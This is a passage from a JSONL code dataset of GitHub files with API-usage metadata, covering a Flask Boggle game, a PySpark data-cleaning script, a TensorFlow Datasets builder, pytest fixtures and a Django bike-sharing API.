"typing.Optional", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 26, "usage_type": "name"}, {"api_name": "flwr.common.Weights", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 26, "usage_type": "name"}, {"api_name": "flwr.common.Scalar", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 28, "usage_type": "name"}, {"api_name": "flwr.common.Scalar", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 29, "usage_type": "name"}, {"api_name": "flwr.common.Scalar", "line_number": 29, "usage_type": "name"}, {"api_name": "flwr.common.Parameters", "line_number": 31, "usage_type": "name"}, {"api_name": "flwr.common.parameters_to_weights", "line_number": 81, "usage_type": "call"}]}
+{"seq_id": "5378424986", "text": "from collections import defaultdict\n\nclass SentenceSimilarity:\n def areSentencesSimilar(self, words1: 'List[str]', words2: 'List[str]', pairs: 'List[List[str]]') -> bool:\n if len(words1) != len(words2): return False\n p_dict = defaultdict(set)\n for p1, p2 in pairs:\n p_dict[p1].add(p2)\n p_dict[p2].add(p1)\n for i in range(len(words1)):\n if words1[i] == words2[i] or\\\n (words1[i] in p_dict and words2[i] in p_dict[words1[i]]):\n continue\n return False\n return True\n", "repo_name": "yokolet/tranquil-beach-python", "sub_path": "tranquil-beach/sorting_searching/sentence_similarity.py", "file_name": "sentence_similarity.py", "file_ext": "py", "file_size_in_byte": 574, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.defaultdict", "line_number": 6, "usage_type": "call"}]}
+{"seq_id": "71517699048", "text": "from flask import Flask, request, render_template, redirect, flash, session, jsonify\n# from flask_debugtoolbar import DebugToolbarExtension\n\nfrom boggle import Boggle\n\nboggle_game = Boggle()\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'folke'\n\n# debug = DebugToolbarExtension(app)\n\n@app.route('/')\ndef start_game():\n \"\"\" Generate game html\"\"\"\n\n # Create board and store it in session\n session['board'] = boggle_game.make_board()\n\n # If player has played before, add session info for highest score and times played.\n highscore = session.get('highscore', 0)\n times_played = session.get('times_played', 0)\n\n return render_template('game.html', board = session['board'], times_played = times_played, highscore = highscore)\n \n@app.route('/check-word')\ndef check_word():\n word = request.args['word']\n check_word = boggle_game.check_valid_word(session['board'], word)\n\n return ({'result': check_word})\n\n\n@app.route('/gameover', methods=['POST'])\ndef get_score():\n \"\"\" Add highscore and times_played to session \"\"\"\n\n # If highscore exists, check if current score from front-end is higher or not.\n if 'highscore' in session:\n if session['highscore'] < request.json['score']:\n session['highscore'] = request.json['score']\n else:\n session['highscore'] = request.json['score']\n\n # Increment times_played by one\n session['times_played'] = session.get('times_played', 0) + 1\n\n return ''", "repo_name": "f-westergren/flask-boggle", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1455, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "boggle.Boggle", "line_number": 6, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 18, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 22, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 28, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 28, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 39, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 41, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 41, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 43, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 46, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 46, "usage_type": "call"}]}
+{"seq_id": "5426809969", "text": "import argparse\nimport os\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col\nfrom pyspark.sql import DataFrame\n\nimport logging\nfrom logging.handlers import RotatingFileHandler\n\nfrom typing import TypeVar, Sequence\nimport sys\n\nos.environ['PYSPARK_PYTHON'] = sys.executable\nos.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable\n\nT = TypeVar('T')\nC = TypeVar('C')\nD = TypeVar('D')\n\nlogger = logging.getLogger(\"KommatiPara-Log\")\nlogger.setLevel(logging.DEBUG)\n\nos.makedirs(\"logs\", exist_ok=True)\n\nhandler = RotatingFileHandler(\"logs/kommatipara.log\", maxBytes=200, backupCount=3)\nlogger.addHandler(handler)\n\nsc = SparkSession.builder.master(\"local\").appName(\"KommatiPara\").getOrCreate()\n\ndef load_csv(filepath: str) -> DataFrame:\n \"\"\"\n Load csv from a given filepath.\n\n :param str filepath: path to the .csv file\n :return: pyspark dataframe\n \"\"\"\n if os.path.exists(filepath):\n df = sc.read.option(\"header\", \"true\").csv(filepath)\n logger.debug(f\"Data loaded: {filepath}\")\n #log dataset loaded\n return df\n \n logger.error(f\"Filepath doesn't exist: {filepath}\")\n raise TypeError(f\"Filepath doesn't exist {filepath}\")\n\ndef filter_data(df: D, filters: Sequence[T], colname: C) -> D:\n \"\"\"\n Filters data given list of filters and a column name.\n\n :param dataframe df: dataframe to be filtered\n :param list filters: list of countries to keep\n :param colname str colname: name of the column for the filter criteria\n :return: filtered dataset\n \"\"\"\n logger.debug(f\"Filtering column: {colname} values: {filters}\")\n return df.filter(col(colname).isin(filters))\n\ndef remove_personal_info(df: DataFrame, personal_info: Sequence[str]) -> DataFrame:\n \"\"\"\n Drops personal info from the dataframe\n :param dataframe df: dataframe where to remove personal info\n :param personal_info list: list of columns to drop\n :return modified dataframe\n \"\"\"\n return df.drop(*personal_info)\n\ndef rename_columns(df: D, columns_to_rename: Sequence[T]) -> D:\n \"\"\"\n Renames columns from dataframe.\n\n :param dataframe df: dataframe where to rename\n :param list columns_to_rename: list of tuples (old name, new name)\n :return: dataframe with renamed columns\n \"\"\"\n logger.debug(f\"Data to be renamed: {columns_to_rename}\")\n for (old,new) in columns_to_rename:\n if not isinstance(new, str):\n logger.error(f\"New column is not a string: {type(new)}\")\n raise TypeError(f\"New column name must be a string, not {type(new)}\")\n df = df.withColumnRenamed(old, new)\n\n return df\n\ndef save_csv_output_file(df: DataFrame, path: str) -> None:\n \"\"\"\n Save output inside the path folder as csv and overwite if already exists\n :param dataframe df: dataframe to be saved\n :param string path: path to the folder where to save the output\n :return void\n \"\"\"\n\n df.write.option(\"header\",True).mode('overwrite').csv(path)\n logger.debug(f\"Output saved on: {path}\")\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--d1', type=str, required=True, help='path to the first dataset')\n parser.add_argument('--d2', type=str, required=True, help='path to the second dataset')\n parser.add_argument('--f','--list', nargs='+', help='Filter on Country', required=True)\n\n opt = parser.parse_args()\n\n logger.debug(f\"Arguments parsed: {opt.d1}, {opt.d2}, {opt.f}\")\n\n df_clients = load_csv(opt.d1)\n df_fin = load_csv(opt.d2)\n\n df_clients = filter_data(df=df_clients, filters=opt.f, colname='country')\n\n df_full_clients = df_clients.join(df_fin, on=['id'], how='inner')\n\n df_full_clients = remove_personal_info(df=df_full_clients, personal_info=['first_name', 'last_name', 'cc_n'])\n\n df_full_clients = rename_columns(df=df_full_clients, columns_to_rename=[('id', 'client_identifier'), ('btc_a', 'bitcoin_address'), ('cc_t', 'credit_card_type')])\n\n save_csv_output_file(df=df_full_clients, path='client_data')", "repo_name": "giuseppefrn/Assignment-KommatiPara", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4004, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 15, "usage_type": "attribute"}, {"api_name": "typing.TypeVar", "line_number": 17, "usage_type": "call"}, {"api_name": "typing.TypeVar", "line_number": 18, "usage_type": "call"}, {"api_name": "typing.TypeVar", "line_number": 19, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 24, "usage_type": "call"}, {"api_name": "logging.handlers.RotatingFileHandler", "line_number": 26, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder.master", "line_number": 29, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pyspark.sql.SparkSession", "line_number": 29, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pyspark.sql.DataFrame", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 47, "usage_type": "name"}, {"api_name": "pyspark.sql.functions.col", "line_number": 57, "usage_type": "call"}, {"api_name": "pyspark.sql.DataFrame", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 68, "usage_type": "name"}, {"api_name": "pyspark.sql.DataFrame", "line_number": 85, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 97, "usage_type": "call"}]}
+{"seq_id": "16415048403", "text": "\"\"\"romania dataset.\"\"\"\n\nimport tensorflow_datasets as tfds\nimport tensorflow as tf\nimport tifffile as tiff\nimport os\nimport re\n\n_DESCRIPTION = \"\"\"\"\"\"\n\n# TODO(romania): BibTeX citation\n_CITATION = \"\"\"\n\"\"\"\n\n_DATA_OPTIONS = ['all', 'artificial-mixtures', 'metabarcoding', 'metabarcoding2', 'metabarcoding3']\n\n\nclass RomaniaConfig(tfds.core.BuilderConfig):\n \"\"\"BuilderConfig for romania dataset.\"\"\"\n\n def __init__(self, dataset=None, selection=None, **kwargs):\n \"\"\"Constructs a RomaniaConfig.\n\n Args:\n selection: `str`, one of `_DATA_OPTIONS`.\n **kwargs: keyword arguments forwarded to super.\n \"\"\"\n\n if selection not in _DATA_OPTIONS:\n raise ValueError('Selection must be one of %s' % _DATA_OPTIONS)\n\n super(RomaniaConfig, self).__init__(\n version=tfds.core.Version('3.0.0'),\n release_notes={\n '3.0.0': 'new artificial mixtures and metabarcoding configs',\n '2.0.0': 'New dataset, metabarcoding config',\n '1.0.0': 'Full dataset'\n },\n **kwargs)\n self.selection = selection\n self.dataset = dataset\n\n\nclass Romania(tfds.core.GeneratorBasedBuilder):\n \"\"\"DatasetBuilder for romania dataset.\"\"\"\n\n MANUAL_DOWNLOAD_INSTRUCTIONS = \"\"\"\n Place the dataset tar.gz file in the `~/tensorflow_datasets/downloads/manual` dir.\n \"\"\"\n\n # pytype: disable=wrong-keyword-args\n BUILDER_CONFIGS = [\n RomaniaConfig(name='all', selection='all', dataset=\"romania-train-3.0.0.tar.gz\", description='All training samples'),\n RomaniaConfig(name='artificial-mixtures', selection='artificial-mixtures', dataset=\"romania-train-3.0.0.tar.gz\", description='All training samples'),\n RomaniaConfig(name='metabarcoding', selection='metabarcoding', dataset=\"romania-train-3.0.0.tar.gz\", description='Training samples that were identified with metabarcoding'),\n RomaniaConfig(name='metabarcoding2', selection='metabarcoding2', dataset=\"romania-train-3.0.0.tar.gz\", description='Training samples that were identified with metabarcoding, monosamples and art. mixtures'),\n RomaniaConfig(name='metabarcoding3', selection='metabarcoding3', dataset=\"romania-train-3.0.0.tar.gz\", description='Training samples that were identified with metabarcoding, additional Hypericum samples')\n ]\n\n # pytype: enable=wrong-keyword-args\n def _info(self) -> tfds.core.DatasetInfo:\n \"\"\"Returns the dataset metadata.\"\"\"\n\n channels = {str(i + 1): tfds.features.Tensor(dtype=tf.uint16, shape=(None, None), encoding='zlib') for i in\n range(6)}\n channels['9'] = tfds.features.Tensor(dtype=tf.uint16, shape=(None, None), encoding='zlib')\n masks = {str(i + 1): tfds.features.Tensor(dtype=tf.uint16, shape=(None, None), encoding='zlib') for i in\n range(6)}\n masks['9'] = tfds.features.Tensor(dtype=tf.uint16, shape=(None, None), encoding='zlib')\n\n features = {'channels': {**channels},\n 'masks': {**masks},\n 'filename': tf.string,\n 'species': tfds.features.ClassLabel(names_file=f'romania/{self.builder_config.selection}-classes-species.txt')}\n\n return tfds.core.DatasetInfo(\n builder=self,\n description=_DESCRIPTION,\n features=tfds.features.FeaturesDict(features),\n supervised_keys=None,\n homepage='https://github.com/lahr/icyt-tfds',\n citation=_CITATION,\n )\n\n def _split_generators(self, dl_manager: tfds.download.DownloadManager):\n \"\"\"Returns SplitGenerators.\"\"\"\n\n path = os.path.join(dl_manager.manual_dir, self.builder_config.dataset)\n\n if not tf.io.gfile.exists(path):\n raise AssertionError(\n f'You must download the dataset .tar.gz file and place it into {dl_manager.manual_dir}')\n\n path_iter = dl_manager.iter_archive(path)\n return {\n 'train': self._generate_examples(path_iter)\n }\n\n def _generate_examples(self, path_iter, split_name=None):\n \"\"\"Yields examples.\"\"\"\n\n path_regex = r'^(?:([^/\\n.A-Z]+)/)?([a-zA-Z]+\\.?[a-zA-Z]+)/(.*)/.*$'\n\n if self.builder_config.selection != 'all':\n with open(f'romania/{self.builder_config.selection}-measurements.txt') as f:\n measurements = tuple([line.rstrip() for line in f])\n\n for filename, fobj in path_iter:\n assert filename is not None\n assert fobj is not None\n\n m = re.match(path_regex, filename)\n\n if self.builder_config.selection != 'all':\n if not m.group(3).startswith(measurements):\n continue\n\n species = m.group(2)\n\n img = tiff.imread(fobj)\n num_channels = img.shape[-1] / 2\n\n if num_channels == 7 or num_channels == 9:\n channels = {str(i + 1): img[:, :, i] for i in range(0, 6)}\n channels['9'] = img[:, :, 6]\n masks = {str(i - 6): img[:, :, i] for i in range(7, 13)}\n masks['9'] = img[:, :, 13]\n\n elif num_channels == 12:\n channels = {str(i + 1): img[:, :, i] for i in range(0, 6)}\n channels['9'] = img[:, :, 8]\n masks = {str(i - 11): img[:, :, i] for i in range(12, 18)}\n masks['9'] = img[:, :, 20]\n\n else:\n raise AssertionError(f'Unknown number of channels ({num_channels}) for file {filename}')\n\n features = {\n 'channels': {**channels},\n 'masks': {**masks},\n 'filename': filename,\n 'species': species}\n\n yield filename, features\n", "repo_name": "lahr/icyt-tfds", "sub_path": "romania/romania.py", "file_name": "romania.py", "file_ext": "py", "file_size_in_byte": 5760, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tensorflow_datasets.core", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.core.Version", "line_number": 33, "usage_type": "call"}, {"api_name": "tensorflow_datasets.core", "line_number": 33, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.core", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.features.Tensor", "line_number": 64, "usage_type": "call"}, {"api_name": "tensorflow_datasets.features", "line_number": 64, "usage_type": "attribute"}, {"api_name": "tensorflow.uint16", "line_number": 64, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.features.Tensor", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow_datasets.features", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tensorflow.uint16", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.features.Tensor", "line_number": 67, "usage_type": "call"}, {"api_name": "tensorflow_datasets.features", "line_number": 67, "usage_type": "attribute"}, {"api_name": "tensorflow.uint16", "line_number": 67, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.features.Tensor", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow_datasets.features", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.uint16", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.string", "line_number": 73, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.features.ClassLabel", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow_datasets.features", "line_number": 74, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.core.DatasetInfo", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow_datasets.core", "line_number": 76, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.features.FeaturesDict", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow_datasets.features", "line_number": 79, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.core", "line_number": 61, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.download", "line_number": 85, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.io.gfile.exists", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 90, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 112, "usage_type": "call"}, {"api_name": "tifffile.imread", "line_number": 120, "usage_type": "call"}]}
+{"seq_id": "14075355", "text": "import pytest\nfrom pytest_factoryboy import register\nfrom graphql_jwt.shortcuts import get_token\n\nfrom factories.plans import PlanFactory\nfrom factories.companies import CompanyFactory\nfrom factories.dealings import DealingFactory\nfrom factories.distribute_logs import DistributeLogFactory\nfrom factories.items import ItemFactory\nfrom factories.exchange_applied_items import ExchangeAppliedItemFactory\nfrom factories.exchanged_item_logs import ExchangedItemLogFactory\nfrom factories.purchased_point_logs import PurchasedPointLogFactory\n\nregister(PlanFactory)\nregister(CompanyFactory)\nregister(DealingFactory)\nregister(DistributeLogFactory)\nregister(ItemFactory)\nregister(ExchangeAppliedItemFactory)\nregister(ExchangedItemLogFactory)\nregister(PurchasedPointLogFactory)\n\nfrom pdb import set_trace as st\n\n\n@pytest.fixture(autouse=True)\ndef test_generate_plan_fixtures(plan_factory):\n plan_factory.create(name=\"free\", fee=0)\n plan_factory.create(name=\"standard\", fee=2000)\n plan_factory.create(name=\"professional\", fee=5000)\n assert True\n\n\n@pytest.fixture\ndef company_fixture(company_factory):\n return company_factory.create(point=1000)\n\n\n@pytest.fixture\ndef create_user_fixture(django_user_model):\n \"\"\"\n userが作成される時に、同時にaccountとprofileも作成される\n \"\"\"\n\n def make_user(**kwargs):\n return django_user_model.objects.create_user(**kwargs)\n\n return make_user\n\n\n# from graphql_jwt.testcases import JSONWebTokenTestCase, JSONWebTokenClient\n# @pytest.fixture\n# def logged_in_client_fixture(company_fixture, create_user_fixture):\n# user = create_user_fixture(\n# email=\"user@test.jp\",\n# password=\"test_password\",\n# company=company_fixture,\n# is_active=True,\n# is_admin=True,\n# )\n\n# client = JSONWebTokenTestCase().client_class()\n# client.authenticate(user)\n# return client, user\n\n\n@pytest.fixture\ndef logged_in_client_fixture(company_fixture, create_user_fixture):\n \"\"\"ログイン済みユーザーのfixture\"\"\"\n user = create_user_fixture(\n email=\"user@test.jp\",\n password=\"test_password\",\n company=company_fixture,\n is_active=True,\n is_admin=True,\n )\n\n headers = {\"HTTP_AUTHORIZATION\": f\"JWT {get_token(user)}\"}\n\n return user, headers\n", "repo_name": "mizutaninaoki/poppie", "sub_path": "test/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 2305, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytest_factoryboy.register", "line_number": 14, "usage_type": "call"}, {"api_name": "factories.plans.PlanFactory", "line_number": 14, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 15, "usage_type": "call"}, {"api_name": "factories.companies.CompanyFactory", "line_number": 15, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 16, "usage_type": "call"}, {"api_name": "factories.dealings.DealingFactory", "line_number": 16, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 17, "usage_type": "call"}, {"api_name": "factories.distribute_logs.DistributeLogFactory", "line_number": 17, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 18, "usage_type": "call"}, {"api_name": "factories.items.ItemFactory", "line_number": 18, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 19, "usage_type": "call"}, {"api_name": "factories.exchange_applied_items.ExchangeAppliedItemFactory", "line_number": 19, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 20, "usage_type": "call"}, {"api_name": "factories.exchanged_item_logs.ExchangedItemLogFactory", "line_number": 20, "usage_type": "argument"}, {"api_name": "pytest_factoryboy.register", "line_number": 21, "usage_type": "call"}, {"api_name": "factories.purchased_point_logs.PurchasedPointLogFactory", "line_number": 21, "usage_type": "argument"}, {"api_name": "pytest.fixture", "line_number": 26, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 39, "usage_type": "attribute"}, {"api_name": "graphql_jwt.shortcuts.get_token", "line_number": 78, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 67, "usage_type": "attribute"}]}
+{"seq_id": "27199747982", "text": "from allauth.socialaccount.models import SocialApp\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.gis.geos import Point\nfrom django.contrib.gis.measure import D\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.contrib.syndication.views import Feed\nfrom django.core.paginator import Paginator\nfrom django.urls import reverse\nfrom django.utils.feedgenerator import Rss201rev2Feed\nfrom django.utils.timezone import now, timedelta\nfrom preferences import preferences\nfrom rest_framework import exceptions, generics, mixins, status, viewsets\nfrom rest_framework.authentication import SessionAuthentication, TokenAuthentication\nfrom rest_framework.decorators import (\n action,\n api_view,\n authentication_classes,\n permission_classes,\n)\nfrom rest_framework.permissions import (\n SAFE_METHODS,\n AllowAny,\n BasePermission,\n IsAuthenticated,\n)\nfrom rest_framework.response import Response\nfrom rest_framework.views import exception_handler\nfrom rest_framework_api_key.permissions import HasAPIKey\n\nfrom bikesharing.models import Bike, Location, LocationTracker, Rent, Station\nfrom cykel.models import CykelLogEntry\n\nfrom .authentication import BasicTokenAuthentication\nfrom .serializers import (\n BikeSerializer,\n CreateRentSerializer,\n LocationTrackerUpdateSerializer,\n MaintenanceBikeSerializer,\n RentSerializer,\n SocialAppSerializer,\n StationSerializer,\n UserDetailsSerializer,\n)\n\n\nclass BikeViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = Bike.objects.all()\n serializer_class = BikeSerializer\n\n\nclass StationViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = Station.objects.all()\n serializer_class = StationSerializer\n\n\nclass CanRentBikePermission(BasePermission):\n \"\"\"The request is authenticated as a user and has add_rent permission.\"\"\"\n\n message = \"You cannot rent a bike at this time.\"\n\n def has_permission(self, request, view):\n if not request.user or not request.user.is_authenticated:\n return False\n\n if request.method in SAFE_METHODS:\n return True\n\n return request.user.has_perm(\"bikesharing.add_rent\")\n\n\nclass CanUseMaintenancePermission(BasePermission):\n \"\"\"The request is authenticated as a user and has maintenance\n permission.\"\"\"\n\n def has_permission(self, request, view):\n if not request.user or not request.user.is_authenticated:\n return False\n\n return request.user.has_perm(\"bikesharing.maintain\")\n\n\n@permission_classes([IsAuthenticated, CanRentBikePermission])\nclass RentViewSet(\n mixins.CreateModelMixin,\n mixins.RetrieveModelMixin,\n mixins.ListModelMixin,\n viewsets.GenericViewSet,\n):\n def get_serializer_class(self):\n if self.action == \"create\":\n return CreateRentSerializer\n else:\n return RentSerializer\n\n def get_queryset(self):\n user = self.request.user\n return Rent.objects.filter(user=user, rent_end=None)\n\n def create(self, request):\n resp = super().create(request)\n if resp.status_code != status.HTTP_201_CREATED:\n return resp\n\n rent = self.get_queryset().get(id=resp.data[\"id\"])\n\n if rent.bike.state == Bike.State.MISSING:\n data = {}\n if rent.start_location:\n data = {\"location_id\": rent.start_location.id}\n\n CykelLogEntry.objects.create(\n content_object=rent.bike,\n action_type=\"cykel.bike.missing_reporting\",\n data=data,\n )\n\n # override output with RentSerializer\n serializer = RentSerializer(rent, context={\"request\": request})\n headers = self.get_success_headers(serializer.data)\n return Response(\n serializer.data, status=status.HTTP_201_CREATED, headers=headers\n )\n\n @action(detail=True, methods=[\"post\"])\n def finish(self, request, pk=None):\n rent = self.get_object()\n\n lat = request.data.get(\"lat\")\n lng = request.data.get(\"lng\")\n\n if rent.user != request.user:\n return Response(\n {\"error\": \"rent belongs to another user\"},\n status=status.HTTP_403_PERMISSON_DENIED,\n )\n if rent.rent_end is not None:\n return Response(\n {\"error\": \"rent was already finished\"}, status=status.HTTP_410_GONE\n )\n\n end_location = None\n if lat and lng:\n end_location = Location.objects.create(\n bike=rent.bike,\n source=Location.Source.USER,\n reported_at=now(),\n geo=Point(float(lng), float(lat), srid=4326),\n )\n\n rent.end(end_location)\n\n return Response({\"success\": True})\n\n @action(detail=True, methods=[\"post\"])\n def unlock(self, request, pk=None):\n rent = self.get_object()\n\n if rent.user != request.user:\n return Response(\n {\"error\": \"rent belongs to another user\"},\n status=status.HTTP_403_PERMISSON_DENIED,\n )\n\n if rent.rent_end is not None:\n return Response(\n {\"error\": \"rent was already finished\"}, status=status.HTTP_410_GONE\n )\n\n try:\n data = rent.unlock()\n except Exception as e:\n print(e)\n return Response({\"success\": False})\n\n return Response({\"success\": True, \"data\": data})\n\n\n@api_view([\"POST\"])\n@permission_classes([HasAPIKey])\ndef updatebikelocation(request):\n device_id = request.data.get(\"device_id\")\n if not (device_id):\n return Response({\"error\": \"device_id missing\"}, status=400)\n try:\n tracker = LocationTracker.objects.get(device_id=device_id)\n except LocationTracker.DoesNotExist:\n return Response({\"error\": \"tracker does not exist\"}, status=404)\n\n serializer = LocationTrackerUpdateSerializer(tracker, data=request.data)\n if not serializer.is_valid():\n return Response(serializer.errors, status=400)\n\n serializer.save()\n\n lat = request.data.get(\"lat\")\n lng = request.data.get(\"lng\")\n accuracy = request.data.get(\"accuracy\")\n loc = None\n\n if lat and lng:\n loc = Location(\n source=Location.Source.TRACKER,\n reported_at=now(),\n tracker=tracker,\n geo=Point(float(lng), float(lat), srid=4326),\n )\n if tracker.bike:\n loc.bike = tracker.bike\n if accuracy:\n loc.accuracy = accuracy\n loc.save()\n\n if tracker.bike:\n bike = tracker.bike\n bike.last_reported = now()\n\n if loc and not loc.internal:\n # check if bike is near station and assign it to that station\n # distance ist configured in prefernces\n max_distance = preferences.BikeSharePreferences.station_match_max_distance\n station_closer_than_Xm = Station.objects.filter(\n location__distance_lte=(loc.geo, D(m=max_distance)),\n status=Station.Status.ACTIVE,\n ).first()\n if station_closer_than_Xm:\n bike.current_station = station_closer_than_Xm\n else:\n bike.current_station = None\n\n bike.save()\n\n someminutesago = now() - timedelta(minutes=15)\n data = {}\n if loc:\n data = {\"location_id\": loc.id}\n\n if tracker.tracker_status == LocationTracker.Status.MISSING:\n action_type = \"cykel.tracker.missing_reporting\"\n CykelLogEntry.create_unless_time(\n someminutesago, content_object=tracker, action_type=action_type, data=data\n )\n\n if tracker.bike and tracker.bike.state == Bike.State.MISSING:\n action_type = \"cykel.bike.missing_reporting\"\n CykelLogEntry.create_unless_time(\n someminutesago,\n content_object=tracker.bike,\n action_type=action_type,\n data=data,\n )\n\n if not loc:\n return Response({\"success\": True, \"warning\": \"lat/lng missing\"})\n\n return Response({\"success\": True})\n\n\n@authentication_classes(\n [SessionAuthentication, TokenAuthentication, BasicTokenAuthentication]\n)\n@permission_classes([IsAuthenticated, CanUseMaintenancePermission])\nclass MaintenanceViewSet(viewsets.ViewSet):\n @action(detail=False, methods=[\"GET\"])\n def mapdata(self, request):\n bikes = Bike.objects.filter(location__isnull=False).distinct()\n serializer = MaintenanceBikeSerializer(bikes, many=True)\n return Response(serializer.data)\n\n @action(detail=False, methods=[\"GET\"])\n def logentryfeed(self, request):\n feed = LogEntryFeed()\n return feed(request)\n\n\nclass UserDetailsView(generics.RetrieveAPIView):\n \"\"\"Reads UserModel fields Accepts GET method.\n\n Default accepted fields: username Default display fields: pk,\n username Read-only fields: pk Returns UserModel fields.\n \"\"\"\n\n serializer_class = UserDetailsSerializer\n permission_classes = (IsAuthenticated,)\n\n def get_object(self):\n return self.request.user\n\n def get_queryset(self):\n \"\"\"Adding this method since it is sometimes called when using django-\n rest-swagger https://github.com/Tivix/django-rest-auth/issues/275.\"\"\"\n return get_user_model().objects.none()\n\n\n@permission_classes([AllowAny])\nclass LoginProviderViewSet(\n mixins.ListModelMixin,\n viewsets.GenericViewSet,\n):\n \"\"\"return the configured social login providers.\"\"\"\n\n serializer_class = 